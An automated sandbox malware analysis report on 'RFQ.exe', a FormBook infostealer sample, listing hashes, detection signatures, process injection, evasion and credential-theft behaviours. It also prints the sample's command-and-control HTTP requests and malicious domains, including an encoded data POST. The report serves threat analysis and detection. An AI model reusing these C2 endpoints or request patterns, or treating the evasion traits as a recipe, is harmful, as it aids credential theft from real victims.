Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name:RFQ.exe
Analysis ID:1554222
MD5:b5e39c660b2e4f19cc14b94df9b6497c
SHA1:ee331feebc062f0b0a226d36e8f0817af0cc9d65
SHA256:593c8605076c650720fcdfa1fada91472d792da661c0f6713f857a9780a6a6eb
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: B5E39C660B2E4F19CC14B94DF9B6497C)
    • svchost.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • aSgPuBFuPS.exe (PID: 3732 cmdline: "C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • aSgPuBFuPS.exe (PID: 2060 cmdline: "C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.3a0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.3a0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 7596, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7612, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 7596, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 7612, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T08:51:57.429971+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449730TCP
                2024-11-12T08:52:35.768193+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449741TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RFQ.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.corpseflowerwatch.org/yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStXAvira URL Cloud: Label: malware
                Source: http://www.4nk.education/gnvu/Avira URL Cloud: Label: malware
                Source: http://www.4nk.education/gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStXAvira URL Cloud: Label: malware
                Source: http://www.migraine-massages.pro/ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStXAvira URL Cloud: Label: malware
                Source: http://www.migraine-massages.pro/ym43/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: RFQ.exeReversingLabs: Detection: 62%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RFQ.exeJoe Sandbox ML: detected
                Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aSgPuBFuPS.exe, 00000002.00000000.1724430946.000000000098E000.00000002.00000001.01000000.00000004.sdmp, aSgPuBFuPS.exe, 00000005.00000000.1886858443.000000000098E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F680C FindFirstFileW,FindClose,0_2_006F680C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006F68AD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ECF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ECF94
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ED2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ED2C7
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F9560
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F96BB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006F9A49
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_006EDADC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F5BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_006F5BB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B0C820 FindFirstFileW,FindNextFileW,FindClose,3_2_00B0C820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax3_2_00AF9D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h3_2_032004E8
                Source: Joe Sandbox ViewIP Address: 128.65.195.180 128.65.195.180
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49741
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FCD62 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_006FCD62
                Source: global trafficHTTP traffic detected: GET /yjfe/?L2m0Zn=ssLl/70GAhUcKdDjElf9oY7c1Toe/LKZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYqz93E4YYiGwwRQuF1AOSzaR72LbFn096Vw=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d26j/?L2m0Zn=yTdTvK6nwd7fLzOcZ1KS4TBFSWEE7xEBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3l8PVEl0DEVtj8ozSBQBBAVHa7hfB74pOyU=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vnxoso88.artUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /afcr/?L2m0Zn=pxUnB3/JQIgHT0Xo3IWq6WCCUHVXBaIMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ABar8QBPLOAn7b24mX56Fs9L7gSNzzZg1Hk=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pluribiz.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1iqa/?L2m0Zn=EIYp+2qno3OyA6JS9Y7uk1QSTQ5f7vCBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhVH33IbkgUmM7v94zdg8dOLyK52Qf4FB6p0=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kdtzhb.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /293d/?JPc=NBQdBBkPWTStX&L2m0Zn=7bOTn4s4CK+jD9Jyb+vO73Pd/AR3TsBOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRY9J7LzjC0OYPsgDdyhfDZaDgEJItAmmuk4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.evoo.websiteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vdvc/?L2m0Zn=5MdYmwdbGD0BDYmZXtqVosi+TlTx67ljMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReNcAXJ0cKe8GCCdvHCelE6JjJemFhTRqEaU=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.astorg-group.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0m8a/?JPc=NBQdBBkPWTStX&L2m0Zn=g30HQpd+HgMxFOssrIfrDJeMHEaPET3LohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp4aasf9fUqZys1Rw05sAbj1FN7j6PbWaPRM= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fiqsth.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ezyn/?L2m0Zn=JlwzIZwI1xJFqouQZaQIGT5Gjbtg/srAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLN5/O1cb4M0DAqfax7N6cXJuCkbka7xORy4=&JPc=NBQdBBkPWTStX HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bio-thymus.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ezc/?JPc=NBQdBBkPWTStX&L2m0Zn=xtzn0DJhGGCFi+NGW0356zy9k0R5ayLej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pe4/4DLJl/A2P/VorJYWOIYL6GivXmTWJR8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wukong.collegeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.corpseflowerwatch.org
                Source: global trafficDNS traffic detected: DNS query: www.4nk.education
                Source: global trafficDNS traffic detected: DNS query: www.migraine-massages.pro
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.pluribiz.life
                Source: global trafficDNS traffic detected: DNS query: www.kdtzhb.top
                Source: global trafficDNS traffic detected: DNS query: www.evoo.website
                Source: global trafficDNS traffic detected: DNS query: www.astorg-group.info
                Source: global trafficDNS traffic detected: DNS query: www.fiqsth.vip
                Source: global trafficDNS traffic detected: DNS query: www.bio-thymus.com
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: global trafficDNS traffic detected: DNS query: www.vehiculargustav.click
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 4c 32 6d 30 5a 6e 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 56 54 6c 50 34 43 6f 33 2b 73 53 46 39 58 35 37 77 41 6c 4e 44 71 4d 37 66 63 49 50 2b 57 4d 55 67 3d 3d Data Ascii: L2m0Zn=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTVTlP4Co3+sSF9X57wAlNDqM7fcIP+WMUg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
